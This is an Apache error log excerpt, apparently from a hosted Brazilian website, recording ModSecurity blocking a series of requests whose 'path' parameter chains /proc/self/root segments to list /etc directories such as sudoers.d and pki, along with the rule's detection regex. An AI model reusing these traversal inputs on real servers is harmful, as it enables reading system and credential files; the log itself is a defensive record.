https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:27:59.746055 2026] [mime_magic:error] [pid 11642:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:44602] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:28:04.613805 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.243.128:57968] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hNNa6ubjKNq_cu4bNxwAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:09.540269 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:55202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hOfXLqtnMIWvjpaKTxwAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:13.488174 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:35016] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hPF1pVZ5mVmJwsFMpcgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:20.141323 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.243.128:35024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hQwF0L0L-SsrnPo5h0AAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:22.214689 2026] [mime_magic:error] [pid 7235:tid 140411599251200] (70014)End of file found: [client 57.141.18.15:45564] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:28:26.689140 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:58026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hSta6ubjKNq_cu4bN4gAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:33.720779 2026] [:error] [pid 11167:tid 140411674785536] [client 74.7.243.128:58030] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hUPHIg5MgXLBnicPx8AAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:36.122651 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.241.31:39302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hVAF0L0L-SsrnPo5h3gAAAsI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 07:28:41.026924 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:51686] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hWV1pVZ5mVmJwsFMpoAAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:43.267127 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:48664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hW_HIg5MgXLBnicPx_QAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:28:54.625761 2026] [mime_magic:error] [pid 7235:tid 140411607643904] (70014)End of file found: [client 57.141.18.20:47332] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:28:55.885780 2026] [mime_magic:error] [pid 21219:tid 140411683178240] (70014)End of file found: [client 216.73.216.191:47398] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:29:01.434006 2026] [mime_magic:error] [pid 10189:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:47742] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:29:11.122240 2026] [:error] [pid 9818:tid 140411666392832] [client 74.7.243.128:48668] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hd11pVZ5mVmJwsFMpxgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:29:22.615417 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:33164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hgjJ3M9BSuKP7CAYUYQAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:29:27.038096 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.243.128:39576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hhwF0L0L-SsrnPo5iDgAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:29:28.382528 2026] [:error] [pid 9818:tid 140411616036608] [client 74.7.243.128:39578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hiF1pVZ5mVmJwsFMpyQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:29:34.071065 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:51372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hjuoXxyEfFpUF8f97hgAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:29:43.172736 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:51376] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hl9a6ubjKNq_cu4bOPwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:29:47.286230 2026] [mime_magic:error] [pid 11642:tid 140411674785536] (70014)End of file found: [client 57.141.18.108:49052] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:29:52.447587 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:38730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hoNa6ubjKNq_cu4bOTwAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:29:55.936787 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.243.128:42866] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0howF0L0L-SsrnPo5iIAAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:30:09.056781 2026] [mime_magic:error] [pid 11167:tid 140411733534464] (70014)End of file found: [client 57.141.18.57:49934] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:30:23.751651 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:42878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hv_qxLDW4GITHUkTggQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:30:25.845774 2026] [mime_magic:error] [pid 26799:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:50478] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:30:30.187593 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:38762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0hxeoXxyEfFpUF8f97pQAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:30:42.787533 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:35712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 